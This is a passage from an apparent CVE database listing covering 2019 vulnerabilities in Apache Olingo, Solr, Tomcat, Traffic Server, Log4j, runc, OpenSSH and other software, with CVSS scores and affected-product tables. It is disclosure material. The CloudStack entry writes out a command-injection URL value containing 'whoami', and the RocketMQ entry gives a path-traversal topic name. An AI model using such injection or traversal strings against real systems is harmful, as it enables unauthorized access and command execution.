nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache olingo *
CVE-2019-17556 HIGH

Apache Olingo versions 4.0.0 to 4.6.0 provide the AbstractService class, which is public API, uses ObjectInputStream and doesn't check classes being deserialized. If an attacker can feed malicious metadata to the class, then it may result in running attacker's code in the worse case.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache olingo *
CVE-2019-17557 LOW

It was found that the Apache Syncope EndUser UI login page prio to 2.0.15 and 2.1.6 reflects the successMessage parameters. By this mean, a user accessing the Enduser UI could execute javascript code from URL query string.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache syncope *
CVE-2019-17558 MEDIUM

Apache Solr 5.0.0 to Apache Solr 8.3.1 are vulnerable to a Remote Code Execution through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/` directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled` by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-74,CWE-74,

Products Affected

Vendor Product Version
oracle primavera_unifier 19.12
oracle primavera_unifier 16.2
oracle primavera_unifier *
oracle primavera_unifier 18.8
oracle primavera_unifier 16.1
apache solr *
CVE-2019-17559 HIGH

There is a vulnerability in Apache Traffic Server 6.0.0 to 6.2.3, 7.0.0 to 7.1.8, and 8.0.0 to 8.0.5 with a smuggling attack and scheme parsing. Upgrade to versions 7.1.9 and 8.0.6 or later versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-444,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2019-17560 MEDIUM

The "Apache NetBeans" autoupdate system does not validate SSL certificates and hostnames for https based downloads. This allows an attacker to intercept downloads of autoupdates and modify the download, potentially injecting malicious code. “Apache NetBeans" versions up to and including 11.2 are affected by this vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
oracle graalvm 19.3.2
apache netbeans *
oracle graalvm 20.1.0
CVE-2019-17561 MEDIUM

The "Apache NetBeans" autoupdate system does not fully validate code signatures. An attacker could modify the downloaded nbm and include additional code. "Apache NetBeans" versions up to and including 11.2 are affected by this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-347,

Products Affected

Vendor Product Version
oracle graalvm 19.3.2
apache netbeans *
oracle graalvm 20.1.0
CVE-2019-17562 HIGH

A buffer overflow vulnerability has been found in the baremetal component of Apache CloudStack. This applies to all versions prior to 4.13.1. The vulnerability is due to the lack of validation of the mac parameter in baremetal virtual router. If you insert an arbitrary shell command into the mac parameter, v-router will process the command. For example: Normal: http://{GW}:10086/baremetal/provisiondone/{mac}, Abnormal: http://{GW}:10086/baremetal/provisiondone/#';whoami;#. Mitigation of this issue is an upgrade to Apache CloudStack 4.13.1.0 or beyond.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2019-17563 MEDIUM

When using FORM authentication with Apache Tomcat 9.0.0.M1 to 9.0.29, 8.5.0 to 8.5.49 and 7.0.0 to 7.0.98 there was a narrow window where an attacker could perform a session fixation attack. The window was considered too narrow for an exploit to be practical but, erring on the side of caution, this issue has been treated as a security vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-384,

Products Affected

Vendor Product Version
oracle instantis_enterprisetrack *
oracle hyperion_infrastructure_technology 11.1.2.4
oracle micros_relate_crm_software 11.4
debian debian_linux 9.0
opensuse leap 15.1
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
debian debian_linux 8.0
apache tomcat *
oracle transportation_management 6.3.7
canonical ubuntu_linux 16.04
oracle mysql_enterprise_monitor *
oracle retail_order_broker 15.0
CVE-2019-17564 MEDIUM

Unsafe deserialization occurs within a Dubbo application which has HTTP remoting enabled. An attacker may submit a POST request with a Java object in it to completely compromise a Provider instance of Apache Dubbo, if this instance enables HTTP. This issue affected Apache Dubbo 2.7.0 to 2.7.4, 2.6.0 to 2.6.7, and all 2.5.x versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2019-17565 HIGH

There is a vulnerability in Apache Traffic Server 6.0.0 to 6.2.3, 7.0.0 to 7.1.8, and 8.0.0 to 8.0.5 with a smuggling attack and chunked encoding. Upgrade to versions 7.1.9 and 8.0.6 or later versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-444,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2019-17566 MEDIUM

Apache Batik is vulnerable to server-side request forgery, caused by improper input validation by the "xlink:href" attributes. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
oracle instantis_enterprisetrack *
oracle jd_edwards_enterpriseone_tools *
apache batik *
oracle enterprise_repository 11.1.1.7.0
oracle financial_services_analytical_applications_infrastructure *
oracle api_gateway 11.1.2.4.0
oracle business_intelligence 12.2.1.4.0
oracle hospitality_opera_5 5.6
oracle business_intelligence 5.9.0.0.0
oracle business_intelligence 5.5.0.0.0
oracle business_intelligence 12.2.1.3.0
oracle retail_order_broker 15.0
oracle retail_integration_bus 15.0.3
oracle retail_order_management_system_cloud_service 19.5
oracle retail_returns_management 14.1
oracle retail_order_broker 16.0
oracle communications_application_session_controller 3.9m0p2
oracle communications_offline_mediation_controller 12.0.0.3.0
oracle hyperion_financial_reporting 11.1.2.4
oracle retail_point-of-service 14.1
oracle fusion_middleware_mapviewer 12.2.1.4.0
oracle jd_edwards_enterpriseone_tools 9.2.4.2
oracle communications_metasolv_solution *
oracle hospitality_opera_5 5.5
oracle hyperion_financial_reporting 11.2.5.0
CVE-2019-17567 MEDIUM

Apache HTTP Server versions 2.4.6 to 2.4.46 mod_proxy_wstunnel configured on an URL that is not necessarily Upgraded by the origin server was tunneling the whole connection regardless, thus allowing for subsequent requests on the same connection to pass through with no HTTP validation, authentication or authorization possibly configured.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
oracle instantis_enterprisetrack 17.1
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle enterprise_manager_ops_center 12.4.0.0
CVE-2019-17569 MEDIUM

The refactoring present in Apache Tomcat 9.0.28 to 9.0.30, 8.5.48 to 8.5.50 and 7.0.98 to 7.0.99 introduced a regression. The result of the regression was that invalid Transfer-Encoding headers were incorrectly processed leading to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N 2.2 2.5

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
oracle instantis_enterprisetrack *
debian debian_linux 9.0
opensuse leap 15.1
oracle workload_manager 18c
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
oracle hospitality_guest_access 4.2.1
oracle workload_manager 19c
oracle workload_manager 12.2.0.1
apache tomcat *
oracle transportation_management 6.3.7
oracle communications_instant_messaging_server 10.0.1.4.0
oracle agile_plm 9.3.3
oracle health_sciences_empirica_signal 7.3.3
netapp data_availability_services -
oracle agile_plm 9.3.5
oracle agile_plm 9.3.6
oracle mysql_enterprise_monitor *
oracle hospitality_guest_access 4.2.0
apache tomee 7.0.7
netapp oncommand_system_manager *
oracle health_sciences_empirica_inspections 1.0.1.2
CVE-2019-17570 HIGH

An untrusted deserialization was found in the org.apache.xmlrpc.parser.XmlRpcResponseParser:addResult method of Apache XML-RPC (aka ws-xmlrpc) library. A malicious XML-RPC server could target a XML-RPC client causing it to execute arbitrary code. Apache XML-RPC is no longer maintained and this issue will not be fixed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.04
debian debian_linux 9.0
apache xml-rpc 3.1.1
debian debian_linux 10.0
apache xml-rpc 3.1.2
debian debian_linux 8.0
apache xml-rpc 3.1
fedoraproject fedora 32
canonical ubuntu_linux 16.04
fedoraproject fedora 31
apache xml-rpc 3.1.3
redhat software_collections 1.0
CVE-2019-17571 HIGH

Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,CWE-502,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.04
opensuse leap 15.1
oracle weblogic_server 10.3.6.0.0
debian debian_linux 10.0
apache log4j *
oracle primavera_gateway *
oracle retail_service_backbone 15.0
oracle rapid_planning 12.1
oracle mysql_enterprise_monitor *
netapp oncommand_system_manager *
oracle communications_network_integrity *
oracle weblogic_server 12.2.1.4.0
oracle weblogic_server 12.2.1.3.0
oracle financial_services_lending_and_leasing *
oracle financial_services_lending_and_leasing 12.5.0
debian debian_linux 9.0
debian debian_linux 8.0
oracle application_testing_suite 13.3.0.1
oracle retail_service_backbone 14.1
oracle retail_extract_transform_and_load 19.0
apache bookkeeper *
oracle weblogic_server 14.1.1.0.0
oracle endeca_information_discovery_studio 3.2.0
oracle retail_service_backbone 16.0
netapp oncommand_workflow_automation -
oracle rapid_planning 12.2
oracle weblogic_server 12.1.3.0.0
CVE-2019-17572 MEDIUM

In Apache RocketMQ 4.2.0 to 4.6.0, when the automatic topic creation in the broker is turned on by default, an evil topic like “../../../../topic2020” is sent from rocketmq-client to the broker, a topic folder will be created in the parent directory in brokers, which leads to a directory traversal vulnerability. Users of the affected versions should apply one of the following: Upgrade to Apache RocketMQ 4.6.1 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache rocketmq *
CVE-2019-17573 MEDIUM

By default, Apache CXF creates a /services page containing a listing of the available endpoint names and addresses. This webpage is vulnerable to a reflected Cross-Site Scripting (XSS) attack, which allows a malicious actor to inject javascript into the web page. Please note that the attack exploits a feature which is not typically not present in modern browsers, who remove dot segments before sending the request. However, Mobile applications may be vulnerable.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
oracle communications_session_route_manager 8.1.1
oracle commerce_guided_search 11.3.2
oracle communications_session_report_manager 8.1.1
oracle communications_element_manager 8.2.0
oracle communications_session_report_manager 8.2.1
oracle communications_element_manager 8.1.1
oracle communications_session_report_manager 8.2.0
oracle communications_element_manager 8.2.1
apache cxf *
oracle communications_session_route_manager 8.2.1
oracle communications_session_route_manager 8.2.0
oracle flexcube_private_banking 12.0.0
oracle flexcube_private_banking 12.1.0
oracle retail_order_broker 15.0
CVE-2019-19603 MEDIUM

SQLite 3.30.1 mishandles certain SELECT statements with a nonexistent VIEW, leading to an application crash.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
netapp cloud_backup -
siemens sinec_infrastructure_network_services *
sqlite sqlite 3.30.1
oracle mysql_workbench *
netapp ontap_select_deploy_administration_utility -
siemens sinec_infrastructure_network_services 1.0.1.1
apache guacamole 1.3.0
CVE-2019-19906 MEDIUM

cyrus-sasl (aka Cyrus SASL) 2.1.27 has an out-of-bounds write leading to unauthenticated remote denial-of-service in OpenLDAP via a malformed LDAP packet. The OpenLDAP crash is ultimately caused by an off-by-one error in _sasl_add_string in common.c in cyrus-sasl.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-193,CWE-787,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.04
redhat enterprise_linux_for_power_little_endian_eus 8.4
redhat enterprise_linux_server_update_services_for_sap_solutions 8.4
debian debian_linux 10.0
apple mac_os_x 10.13.6
redhat enterprise_linux 6.0
fedoraproject fedora 32
canonical ubuntu_linux 12.04
redhat enterprise_linux_server_tus 8.4
canonical ubuntu_linux 14.04
cyrusimap cyrus-sasl *
redhat enterprise_linux_for_ibm_z_systems 8.0
apache bookkeeper 4.12.1
redhat enterprise_linux_for_ibm_z_systems_eus 8.4
apple ipados 13.6
apple mac_os_x *
redhat enterprise_linux_for_power_little_endian 8.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
apple mac_os_x 10.14.6
redhat enterprise_linux_eus 8.4
debian debian_linux 8.0
redhat enterprise_linux 7.0
redhat enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions 8.4
canonical ubuntu_linux 16.04
fedoraproject fedora 31
redhat enterprise_linux 5.0
redhat enterprise_linux_server_aus 8.4
redhat jboss_enterprise_web_server 2.0.0
apple iphone_os 13.6
canonical ubuntu_linux 19.10
CVE-2019-19924 MEDIUM

SQLite 3.30.1 mishandles certain parser-tree rewriting, related to expr.c, vdbeaux.c, and window.c. This is caused by incorrect sqlite3WindowRewrite() error handling.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-755,

Products Affected

Vendor Product Version
apache bookkeeper 4.12.1
netapp cloud_backup -
siemens sinec_infrastructure_network_services *
sqlite sqlite 3.30.1
oracle mysql_workbench *
CVE-2019-20445 MEDIUM

HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.04
redhat jboss_amq_clients 2
apache spark 2.4.8
debian debian_linux 9.0
apache spark 2.4.7
debian debian_linux 10.0
netty netty *
redhat jboss_enterprise_application_platform 7.2
redhat jboss_enterprise_application_platform 7.3
debian debian_linux 8.0
fedoraproject fedora 33
CVE-2019-2684 MEDIUM

Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 7u211, 8u202, 11.0.2 and 12; Java SE Embedded: 8u201. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
canonical ubuntu_linux 18.10
canonical ubuntu_linux 18.04
redhat enterprise_linux_eus 8.2
apache cassandra *
apache tomcat *
redhat enterprise_linux_server_tus 8.4
oracle jre 1.8.0
oracle jre 12
redhat enterprise_linux_server 6.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_tus 8.6
redhat enterprise_linux_workstation 7.0
redhat satellite 5.8
oracle jre 1.7.0
redhat enterprise_linux_server_aus 8.6
opensuse leap 15.0
debian debian_linux 9.0
oracle jdk 1.8.0
opensuse leap 42.3
redhat enterprise_linux 8.0
oracle jre 11.0.2
hp xp7_command_view *
redhat enterprise_linux_eus 8.4
redhat enterprise_linux_eus 8.6
redhat enterprise_linux_desktop 6.0
redhat enterprise_linux_eus 8.1
apache cassandra 4.0.0
debian debian_linux 8.0
oracle jdk 1.7.0
canonical ubuntu_linux 16.04
oracle jdk 12
apache tomcat 9.0.0
redhat enterprise_linux_server_aus 8.4
oracle jdk 11.0.2
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server_aus 8.2
redhat enterprise_linux_server_tus 8.2
redhat openshift_container_platform 3.11
redhat enterprise_linux_server 7.0
CVE-2019-5736 HIGH

runc through 1.0-rc6, as used in Docker before 18.09.2 and other products, allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.6 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H 1.8 6.0

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
canonical ubuntu_linux 18.10
redhat openshift 3.7
microfocus service_management_automation 2018.02
canonical ubuntu_linux 18.04
opensuse leap 15.1
apache mesos *
linuxfoundation runc *
d2iq kubernetes_engine *
docker docker *
linuxfoundation runc 1.0.0
microfocus service_management_automation 2018.08
hp onesphere -
netapp solidfire -
netapp hci_management_node -
fedoraproject fedora 29
microfocus service_management_automation 2018.05
redhat openshift 3.6
opensuse leap 15.0
opensuse leap 42.3
redhat enterprise_linux 8.0
opensuse backports_sle 15.0
redhat container_development_kit 3.7
microfocus service_management_automation 2018.11
linuxcontainers lxc *
redhat openshift 3.4
redhat openshift 3.5
canonical ubuntu_linux 16.04
fedoraproject fedora 30
google kubernetes_engine -
d2iq dc/os *
redhat enterprise_linux_server 7.0
CVE-2019-6111 MEDIUM

An issue was discovered in OpenSSH 7.9. Due to the scp implementation being derived from 1983 rcp, the server chooses which files/directories are sent to the client. However, the scp client only performs cursory validation of the object name returned (only directory traversal attacks are prevented). A malicious scp server (or Man-in-The-Middle attacker) can overwrite arbitrary files in the scp client target directory. If recursive operation (-r) is performed, the server can manipulate subdirectories as well (for example, to overwrite the .ssh/authorized_keys file).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,CWE-22,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.10
canonical ubuntu_linux 18.04
redhat enterprise_linux_eus 8.2
fujitsu m10-1_firmware *
openbsd openssh *
fujitsu m10-4s_firmware *
redhat enterprise_linux_server_tus 8.4
freebsd freebsd 12.0
freebsd freebsd *
canonical ubuntu_linux 14.04
redhat enterprise_linux_server_tus 8.6
fujitsu m12-2_firmware *
redhat enterprise_linux_server_aus 8.6
fujitsu m12-1_firmware *
apache mina_sshd 2.2.0
debian debian_linux 9.0
fujitsu m12-2s_firmware *
redhat enterprise_linux 8.0
fujitsu m10-4_firmware *
redhat enterprise_linux_eus 8.4
siemens scalance_x204rna_firmware *
redhat enterprise_linux_eus 8.6
redhat enterprise_linux_eus 8.1
debian debian_linux 8.0
redhat enterprise_linux 7.0
canonical ubuntu_linux 16.04
fedoraproject fedora 30
winscp winscp *
redhat enterprise_linux_server_aus 8.4
redhat enterprise_linux_server_aus 8.2
redhat enterprise_linux_server_tus 8.2
siemens scalance_x204rna_eec_firmware *
CVE-2019-9511 HIGH

Some HTTP/2 implementations are vulnerable to window size manipulation and stream prioritization manipulation, potentially leading to a denial of service. The attacker requests a large amount of data from a specified resource over multiple streams. They manipulate window size and stream priority to force the server to queue the data in 1-byte chunks. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,CWE-770,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
redhat quay 3.0.0
canonical ubuntu_linux 18.04
oracle graalvm 19.2.0
opensuse leap 15.1
debian debian_linux 10.0
apache traffic_server *
redhat jboss_core_services 1.0
f5 nginx *
apple swiftnio *
redhat openshift_service_mesh 1.0
oracle enterprise_communications_broker 3.1.0
fedoraproject fedora 29
nodejs node.js *
opensuse leap 15.0
oracle enterprise_communications_broker 3.2.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
synology vs960hd_firmware -
redhat jboss_enterprise_application_platform 7.2.0
synology skynas -
redhat jboss_enterprise_application_platform 7.3.0
canonical ubuntu_linux 16.04
synology diskstation_manager 6.2
mcafee web_gateway *
fedoraproject fedora 30
redhat software_collections 1.0
CVE-2019-9512 HIGH

Some HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service. The attacker sends continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,CWE-400,

Products Affected

Vendor Product Version
apple swiftnio *
nodejs node.js *
debian debian_linux 10.0
apache traffic_server *
CVE-2019-9513 HIGH

Some HTTP/2 implementations are vulnerable to resource loops, potentially leading to a denial of service. The attacker creates multiple request streams and continually shuffles the priority of the streams in a way that causes substantial churn to the priority tree. This can consume excess CPU.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,NVD-CWE-Other,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
redhat quay 3.0.0
canonical ubuntu_linux 18.04
oracle graalvm 19.2.0
opensuse leap 15.1
debian debian_linux 10.0
apache traffic_server *
redhat jboss_core_services 1.0
f5 nginx *
apple swiftnio *
redhat openshift_service_mesh 1.0
oracle enterprise_communications_broker 3.1.0
fedoraproject fedora 29
nodejs node.js *
opensuse leap 15.0
oracle enterprise_communications_broker 3.2.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
synology vs960hd_firmware -
redhat jboss_enterprise_application_platform 7.2.0
synology skynas -
redhat jboss_enterprise_application_platform 7.3.0
canonical ubuntu_linux 16.04
synology diskstation_manager 6.2
mcafee web_gateway *
fedoraproject fedora 30
redhat software_collections 1.0
CVE-2019-9514 HIGH

Some HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a denial of service. The attacker opens a number of streams and sends an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,CWE-770,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
redhat quay 3.0.0
canonical ubuntu_linux 18.04
oracle graalvm 19.2.0
opensuse leap 15.1
redhat openshift_container_platform 3.10
debian debian_linux 10.0
apache traffic_server *
redhat jboss_core_services 1.0
apple swiftnio *
netapp trident -
f5 big-ip_local_traffic_manager *
redhat openshift_service_mesh 1.0
redhat developer_tools 1.0
fedoraproject fedora 29
redhat enterprise_linux_workstation 7.0
nodejs node.js *
opensuse leap 15.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
redhat single_sign-on 7.3
synology vs960hd_firmware -
redhat jboss_enterprise_application_platform 7.2.0
redhat openshift_container_platform 4.1
synology skynas -
redhat openshift_container_platform 3.9
redhat enterprise_linux_eus 8.1
redhat jboss_enterprise_application_platform 7.3.0
redhat openstack 14
canonical ubuntu_linux 16.04
synology diskstation_manager 6.2
mcafee web_gateway *
fedoraproject fedora 30
netapp cloud_insights -
redhat software_collections 1.0
redhat openshift_container_platform 3.11
redhat enterprise_linux_server 7.0
redhat openshift_container_platform 4.2
CVE-2019-9515 HIGH

Some HTTP/2 implementations are vulnerable to a settings flood, potentially leading to a denial of service. The attacker sends a stream of SETTINGS frames to the peer. Since the RFC requires that the peer reply with one acknowledgement per SETTINGS frame, an empty SETTINGS frame is almost equivalent in behavior to a ping. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,CWE-770,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
redhat quay 3.0.0
canonical ubuntu_linux 18.04
oracle graalvm 19.2.0
opensuse leap 15.1
debian debian_linux 10.0
apache traffic_server *
redhat jboss_core_services 1.0
apple swiftnio *
f5 big-ip_local_traffic_manager *
redhat openshift_service_mesh 1.0
fedoraproject fedora 29
nodejs node.js *
opensuse leap 15.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
redhat single_sign-on 7.3
synology vs960hd_firmware -
redhat jboss_enterprise_application_platform 7.2.0
redhat openshift_container_platform 4.1
synology skynas -
redhat jboss_enterprise_application_platform 7.3.0
redhat openstack 14
canonical ubuntu_linux 16.04
synology diskstation_manager 6.2
mcafee web_gateway *
fedoraproject fedora 30
redhat software_collections 1.0
CVE-2019-9516 MEDIUM

